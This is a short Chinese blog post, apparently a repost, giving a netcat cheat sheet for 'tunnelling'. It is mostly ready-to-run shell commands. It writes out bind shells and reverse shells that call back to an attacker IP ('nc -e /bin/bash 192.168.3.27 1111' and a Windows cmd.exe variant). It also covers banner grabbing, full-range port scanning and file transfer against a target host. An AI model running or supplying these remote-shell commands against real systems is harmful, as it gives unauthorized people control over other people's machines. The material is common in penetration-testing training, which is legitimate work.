其他分享
首页 > 其他分享> > 隧道技术-nc

隧道技术-nc

作者:互联网

shell反弹

正向反弹:攻击机直接连接靶机

条件:攻击机与靶机需互相访问

eg:攻击机:192.168.3.27 靶机:192.168.3.29

1111是端口号

靶机执行:

windows机器:nc -lvvp 1111 -e C:\Windows\System32\cmd.exe

Linux机器:  nc -lvvp 1111 -e /bin/bash

攻击机执行:

nc 192.168.3.29 1111

 

反响反弹:靶机访问攻击机

条件:攻击机不能直接访问靶机,但靶机可以访问攻击机的机器,这个时候用反响shell

eg:攻击机:192.168.3.27 靶机:192.168.3.29

攻击机执行:nc -lvvp 1111 监听1111端口

 靶机执行:

windows机器IP端口:nc -e C:\Windows\System32\cmd.exe 192.168.3.27 1111 

Linux机器IP端口:nc -e /bin/bash 192.168.3.27 1111 

 

Banner抓取:靶机运行着ssh服务,可查看服务版本

nc -nv IP port

端口探测:可查看端口开放

.\nc.exe -nv IP PORT

多端口探测

nc -v -z IP 1-65525

端口监听

nc -l -p Port

文件传输

接收端:nc -lp Port>file

发送端:nc -vn IP Port < file -q 1(Windows是-w Linux是-q)

 

标签:隧道,攻击机,IP,nc,技术,192.168,1111,靶机
来源: https://www.cnblogs.com/lxshen/p/16298851.html